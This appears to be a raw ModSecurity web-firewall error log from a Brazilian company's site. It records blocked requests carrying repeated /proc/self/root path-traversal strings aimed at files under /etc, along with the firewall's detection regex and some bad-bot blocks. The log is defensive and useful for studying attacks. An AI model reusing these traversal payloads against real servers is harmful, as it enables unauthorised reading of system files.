[Tue Mar 17 09:03:00.720336 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.243.203:39200] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC9O82sZHvlq4xgHq_dwAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:02.191361 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.243.203:39212] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC9u82sZHvlq4xgHq_egAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:02.783287 2026] [:error] [pid 2305:tid 140411599251200] [client 74.7.241.46:47128] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC9gQohV2v-7oj5HH3JgAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:03:05.809568 2026] [:error] [pid 7000:tid 140411632822016] [client 74.7.243.203:39222] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC-RePVOt35XCGZP8sAgAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:08.722255 2026] [:error] [pid 1016:tid 140411691570944] [client 74.7.243.203:39238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC_JqmL8PQht4WJFlDOQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:08.911133 2026] [:error] [pid 11469:tid 140411590858496] [client 74.7.241.46:38140] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC_JDEJR9VXonE_-1KQgAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:03:11.435366 2026] [:error] [pid 11469:tid 140411565680384] [client 74.7.243.203:39254] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC_5DEJR9VXonE_-1KRQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:13.475774 2026] [:error] [pid 7000:tid 140411649607424] [client 74.7.243.203:51244] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDABePVOt35XCGZP8sAwAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:14.789460 2026] [:error] [pid 1016:tid 140411624429312] [client 74.7.243.203:51258] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDApqmL8PQht4WJFlDPAAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:14.818815 2026] [:error] [pid 1961:tid 140411540502272] [client 74.7.244.31:56598] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablDAnRXaaWotPICgYshdAAAA1g"]
[Tue Mar 17 09:03:16.039843 2026] [:error] [pid 7000:tid 140411708356352] [client 74.7.243.203:51266] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDBBePVOt35XCGZP8sBAAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:17.201892 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.243.203:51282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDBaBJNF7axNlVR0X5UAAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:21.385565 2026] [:error] [pid 1961:tid 140411632822016] [client 74.7.243.203:51284] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDCXRXaaWotPICgYshdwAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:22.702727 2026] [:error] [pid 7000:tid 140411725141760] [client 74.7.243.203:37532] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDChePVOt35XCGZP8sBwAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:23.871755 2026] [:error] [pid 7000:tid 140411607643904] [client 74.7.243.203:37548] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDCxePVOt35XCGZP8sCAAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:25.589677 2026] [:error] [pid 11469:tid 140411741927168] [client 74.7.243.203:37550] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDDZDEJR9VXonE_-1KSQAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:03:27.055560 2026] [:error] [pid 1210:tid 140411616036608] [client 74.7.228.16:59018] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablDD1KJy4A1bGlmj9BSAQAAAk8"]
[Tue Mar 17 09:03:57.798647 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.243.203:37560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDLQeiSKl8TjouI-b-yQAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:00.191444 2026] [:error] [pid 1016:tid 140411725141760] [client 74.7.243.203:46962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDMJqmL8PQht4WJFlDegAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:04.488295 2026] [:error] [pid 2305:tid 140411590858496] [client 74.7.241.46:41656] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDNAQohV2v-7oj5HH3XAAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:04:07.984195 2026] [:error] [pid 1961:tid 140411674785536] [client 74.7.243.203:41362] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDN3RXaaWotPICgYshkQAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:09.779538 2026] [:error] [pid 1210:tid 140411557287680] [client 74.7.243.203:41372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDOVKJy4A1bGlmj9BSJQAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:12.191459 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.243.203:58004] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] 